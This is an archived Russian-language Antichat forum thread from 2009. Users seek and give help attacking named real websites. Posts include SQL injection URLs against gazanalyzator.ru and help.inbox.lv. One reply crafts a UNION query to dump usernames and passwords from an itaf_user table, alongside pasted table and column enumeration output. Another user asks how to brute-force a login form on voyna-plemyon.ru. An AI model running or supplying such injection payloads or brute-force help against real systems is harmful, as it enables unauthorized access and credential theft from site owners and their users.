ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.10.2009, 21:20
|
|
Познающий
Регистрация: 09.09.2009
Сообщений: 33
Провел на форуме:
38355
Репутация:
0
|
|
Всем привет.Нашёл инжект в Microsoft JET Dabatase.Узнал пару тройку имён таблиц.Количество полей подобрал.После подстановки реальной таблицы выдаётся ошибка:
Syntax error in FROM clause.
Как это объяснить и как выдрать информацию ?
Запрос вышел что-то вроде parameter+union+select+1,2,3+FROM+realtable
|
|
|
04.10.2009, 22:00
|
|
Новичок
Регистрация: 03.10.2009
Сообщений: 18
Провел на форуме:
190772
Репутация:
5
|
|
Всем привет)Помогите подобрать имя таблицы, много вариантов перепробовал, но все без успешны...
http://gazanalyzator.ru/?id=70+union+select+1,2/*
Заранее спасибо)
|
|
|
|
05.10.2009, 03:41
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от Torentte
Всем привет)Помогите подобрать имя таблицы, много вариантов перепробовал, но все без успешны...
http://gazanalyzator.ru/?id=70+union+select+1,2/*
Заранее спасибо)
_ttp://gazanalyzator.ru/?id=-70+union+select+version()+from+news/* 
Последний раз редактировалось DrAssault; 05.10.2009 в 04:37..
|
|
|
|
05.10.2009, 15:08
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Torentte
Всем привет)Помогите подобрать имя таблицы, много вариантов перепробовал, но все без успешны...
http://gazanalyzator.ru/?id=70+union+select+1,2/*
Заранее спасибо)
Код:
=============================
gazanalyzator.ru
89.104.81.227
=============================
4.1.22-standard
-------
-------
Найденные таблицы:
-------
itaf_user
news
vote_results
-------
=============================
Найденные колонки из таблицы itaf_user:
-------
id
user_name
user_pass
user_mail
=============================
http://gazanalyzator.ru/?id=70+union+select+1,concat_ws(0x3a,user_name,user_pass)+from+itaf_user/*
Последний раз редактировалось Pashkela; 05.10.2009 в 15:10..
|
|
|
|
05.10.2009, 21:13
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 24
Провел на форуме:
48501
Репутация:
-4
|
|
Привет всем. думаю все знают прагу brutus-aet2. В инете милион статей как с помощью этой праги угнать мыло и фтп, а вот как этой прагой подобрать пасс зная логин к сайту(тоесть к форме) немогу понять. вроде как то получилось так прага вылает левые пароли. кому не трудно обьесните пожалуйста. пытался подобрать пасс к сайту http://www.voyna-plemyon.ru/
|
|
|
|
05.10.2009, 21:20
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от XXXXXX
Привет всем. думаю все знают прагу brutus-aet2. В инете милион статей как с помощью этой праги угнать мыло и фтп, а вот как этой прагой подобрать пасс зная логин к сайту(тоесть к форме) немогу понять. вроде как то получилось так прага вылает левые пароли. кому не трудно обьесните пожалуйста. пытался подобрать пасс к сайту http://www.voyna-plemyon.ru/
http://forum.antichat.ru/thread109600.html
Эту попробуй
|
|
|
|
05.10.2009, 23:38
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 24
Провел на форуме:
48501
Репутация:
-4
|
|
Сообщение от SeNaP
http://forum.antichat.ru/thread109600.html
Эту попробуй
Возможностей много но прага сырая. 
Обьясни как брудить форму прагой brutus-aet2. 
|
|
|
|
06.10.2009, 02:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Прога не сырая а универсальная, как раз формы норм брутит....
|
|
|
|
06.10.2009, 04:37
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
http://help.inbox.lv/?language=-1+union+select+1,2,3/*
Скажите, тут реально вывести версию базы даных?
Если да, то пример плз.
|
|
|
|
06.10.2009, 07:47
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Nightmarе
http://help.inbox.lv/?language=-1+union+select+1,2,3/*
Скажите, тут реально вывести версию базы даных?
Если да, то пример плз.
И так
Твой запрос приводит к ошибке.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
Т.е. intval() нету, что неплохо.
Зато просто ограничение в 2 символа
Если хочешь, крути скулю в лимит 2 символа 
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
